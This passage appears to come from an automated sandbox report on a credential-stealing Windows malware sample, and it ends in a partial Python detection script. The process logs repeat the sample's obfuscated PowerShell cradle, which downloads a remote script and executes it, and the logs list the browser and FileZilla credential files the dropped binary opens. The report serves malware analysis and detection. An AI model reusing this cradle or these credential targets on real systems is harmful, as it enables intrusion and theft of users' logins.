            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599203Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598859Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598750Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EC7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Video2n
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1524954330.0000025476F39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EC7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
            Source: DBp7mBJwqD.exeBinary or memory string: jdk.graal.compiler.hotspot.HotSpotGraalJVMCIServiceLocator
            Source: DBp7mBJwqD.exeBinary or memory string: com.oracle.svm.enterprise.virtualization.vmm.qemu
            Source: DBp7mBJwqD.exeBinary or memory string: :jdk.graal.compiler.hotspot.HotSpotGraalJVMCIServiceLocator
            Source: DBp7mBJwqD.exeBinary or memory string: 1com.oracle.svm.enterprise.virtualization.vmm.qemu
            Source: DBp7mBJwqD.exeBinary or memory string: ,jdk.vm.ci.hotspot.HotSpotJVMCIBackendFactory
            Source: DBp7mBJwqD.exeBinary or memory string: 3com.oracle.svm.enterprise.virtualization.vmm.qemu.c
            Source: DBp7mBJwqD.exeBinary or memory string: VirtualMachineError.java
            Source: DBp7mBJwqD.exeBinary or memory string: 3com.oracle.svm.enterprise.virtualization.vmm.qemu.b
            Source: DBp7mBJwqD.exeBinary or memory string: jdk.vm.ci.services.JVMCIServiceLocator
            Source: DBp7mBJwqD.exeBinary or memory string: java.lang.VirtualMachineError
            Source: DBp7mBJwqD.exeBinary or memory string: &jdk.vm.ci.services.JVMCIServiceLocator
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EC7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Video
            Source: powershell.exe, 00000008.00000002.1621057399.000001926DF2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: DBp7mBJwqD.exeBinary or memory string: Native image does not support the following JVMCI CPU features: !
            Source: DBp7mBJwqD.exeBinary or memory string: java.lang.VirtualMachineErrorS
            Source: DBp7mBJwqD.exeBinary or memory string: 1com.oracle.svm.enterprise.virtualization.vmm.qemu#
            Source: DBp7mBJwqD.exeBinary or memory string: 23.0.1+11-jvmci-b01
            Source: DBp7mBJwqD.exeBinary or memory string: 23.0.1+11-jvmci-b01W
            Source: DBp7mBJwqD.exeBinary or memory string: @Native image does not support the following JVMCI CPU features: !
            Source: DBp7mBJwqD.exeBinary or memory string: jdk.vm.ci.hotspot.HotSpotJVMCIBackendFactory
            Source: DBp7mBJwqD.exeBinary or memory string: com.oracle.svm.enterprise.virtualization.vmm.qemu.b
            Source: DBp7mBJwqD.exe, 00000000.00000002.1327849631.00000290E9467000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]]~+P
            Source: DBp7mBJwqD.exeBinary or memory string: com.oracle.svm.enterprise.virtualization.vmm.qemu.c
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EC7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            Source: WDSecureUtilities_548.exe.8.dr, Dogacocaguc.cs | Reference to suspicious API methods: Gobutyfybyk.Kernel32.OpenProcess(Gobutyfybyk.Debugezeserocat.DuplicateHandle, bInheritHandle: true, (uint)Ijakuvekygelusumy)
            Source: WDSecureUtilities_548.exe.8.dr, Igijigomenu.cs | Reference to suspicious API methods: LoadLibrary(Gyxemurinazulovyn)
            Source: WDSecureUtilities_548.exe.8.dr, Igijigomenu.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(intPtr, Nemalapisiputotup), typeof(T))
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script""
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe "C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe" -pkek -aoa -y
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c "cmd.exe /c start /min cmd /c powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script""
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c start /min cmd /c powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script"
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c "cmd.exe /c start /min cmd /c powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script""
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c start /min cmd /c powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -noni -executionpolicy bypass -command "$ai='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$ai+$mode+$update+$dev+$beta; $useragent='tradingview'; $response=invoke-webrequest -uri $charts -usebasicparsing -useragent $useragent; $script=[system.text.encoding]::utf8.getstring($response.content); iex $script"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | Queries volume information: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: 0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: WDSecureUtilities_548.exe PID: 3432, type: MEMORYSTR
            Source: Yara match | File source: 0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.1515907713.000002545EC7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.1515907713.000002545EAF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: WDSecureUtilities_548.exe PID: 3432, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml

            Remote Access Functionality

            Source: Yara match | File source: 0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: WDSecureUtilities_548.exe PID: 3432, type: MEMORYSTR
            Source: Yara match | File source: 0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.1515907713.000002545EC7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.1515907713.000002545EAF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: WDSecureUtilities_548.exe PID: 3432, type: MEMORYSTR

            MITRE ATT&CK Matrix (one line per tactic; the numeric prefixes are the report's per-technique signature counts)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
            Execution: 231 Windows Management Instrumentation; 12 Command and Scripting Interpreter; 1 Native API; 3 PowerShell; Launchd; Scheduled Task
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
            Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
            Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 251 Virtualization/Sandbox Evasion; 11 Process Injection; 11 Obfuscated Files or Information; 1 DLL Side-Loading
            Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
            Discovery: 331 Security Software Discovery; 1 Process Discovery; 251 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 123 System Information Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
            Collection: 2 Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
            Command and Control: 1 Web Service; 1 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph (ID 1548278, sample DBp7mBJwqD.exe, start date 04/11/2024, architecture WINDOWS, score 100). The graph is written out below as a process tree; numbers in parentheses after a process name are the graph's registry-value/file-count badges as extracted, and each "network" line gives destination IP and port followed by the client ports used.

Top-level DNS/IP nodes: api.telegram.org; get.geojs.io; apitradingview.com
Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 5 other signatures; Uses the Telegram API (likely for C&C communication), attached to api.telegram.org

DBp7mBJwqD.exe (1) started
  cmd.exe (1) started; conhost.exe started
    signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy
    cmd.exe (1) started; conhost.exe started
      cmd.exe (1) started
        signatures: Suspicious powershell command line found
        powershell.exe (14, 26) started; conhost.exe started
          network: apitradingview.com 86.104.15.60:443 (client ports 49717, 49733), BELCLOUDBG, Netherlands
          dropped: C:\Users\user\...\WDSecureUtilities_548.exe, PE32
          signatures: Loading BitLocker PowerShell Module; Powershell drops PE file
          WDSecureUtilities_548.exe (14, 3) started; WmiPrvSE.exe started
            network: api.telegram.org 149.154.167.220:443 (client port 49795), TELEGRAMRU, United Kingdom; get.geojs.io 172.67.70.233:443 (client port 49754), CLOUDFLARENETUS, United States
            dropped: :newads (copy), PE32
            signatures: Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Machine Learning detection for dropped file; 3 other signatures
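The shape of that tree is detectable from endpoint telemetry without any of the indicators in this report: three nested cmd.exe instances, a powershell.exe whose command line bypasses the execution policy and fetches a file, a PE written by that powershell.exe into the user's profile, and the same powershell.exe then starting it. The Python below is an added example written for this page, not Joe Sandbox code. The report does not print the sample's command lines, so the Sysmon-style events, PIDs, paths and the PowerShell command line are constructed assumptions that reproduce the graph's structure; the last two events are a benign control.

```python
"""Behavioural detection for the cmd -> cmd -> cmd -> powershell -> dropped-PE
chain in the behavior graph.  Added example; the events are constructed."""
import re

# Constructed telemetry shaped like Sysmon Event ID 1 (process create) and
# Event ID 11 (file create).  PIDs mirror the graph's node numbers; the
# PowerShell command line is an assumption, the report does not show it.
EVENTS = [
    {"id": 1, "pid": 11, "ppid": 2,  "image": r"C:\Users\user\Desktop\DBp7mBJwqD.exe", "cmd": "DBp7mBJwqD.exe"},
    {"id": 1, "pid": 13, "ppid": 11, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c cmd.exe /c cmd.exe /c powershell ..."},
    {"id": 1, "pid": 18, "ppid": 13, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c cmd.exe /c powershell ..."},
    {"id": 1, "pid": 22, "ppid": 18, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c powershell ..."},
    {"id": 1, "pid": 25, "ppid": 22,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": ("powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "
             "\"Invoke-WebRequest https://apitradingview.com/WDSecureUtilities.exe "
             "-OutFile $env:APPDATA\\WDSecureUtilities_548.exe; "
             "Start-Process $env:APPDATA\\WDSecureUtilities_548.exe\"")},
    {"id": 11, "pid": 25, "target": r"C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe"},
    {"id": 1, "pid": 32, "ppid": 25, "image": r"C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe",
     "cmd": "WDSecureUtilities_548.exe"},
    # Benign control (constructed): an admin running an allowed script from a shell.
    {"id": 1, "pid": 40, "ppid": 2,  "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"id": 1, "pid": 41, "ppid": 40, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -File C:\\ops\\inventory.ps1"},
]

# -ExecutionPolicy accepts abbreviated parameter names, so match those too.
POLICY_BYPASS = re.compile(r"-(?:ExecutionPolicy|ep|ex)\s+(?:Bypass|Unrestricted)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadFile|DownloadString|"
    r"Net\.WebClient|Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)
# A PE written somewhere the current user can write without elevation.
USER_WRITABLE_PE = re.compile(r"\\AppData\\(?:Roaming|Local)\\.*\.exe$", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def process_index(events):
    return {e["pid"]: e for e in events if e["id"] == 1}


def ancestry(pid, procs):
    """Image names from pid up to the root, e.g. ['powershell.exe', 'cmd.exe', ...]."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


def cmd_nesting(chain):
    """Count the consecutive cmd.exe ancestors directly above the first process."""
    depth = 0
    for name in chain[1:]:
        if name != "cmd.exe":
            break
        depth += 1
    return depth


def detect(events):
    """Return (rule, pid, detail) tuples for the two stages of the chain."""
    procs = process_index(events)
    findings = []
    for p in procs.values():
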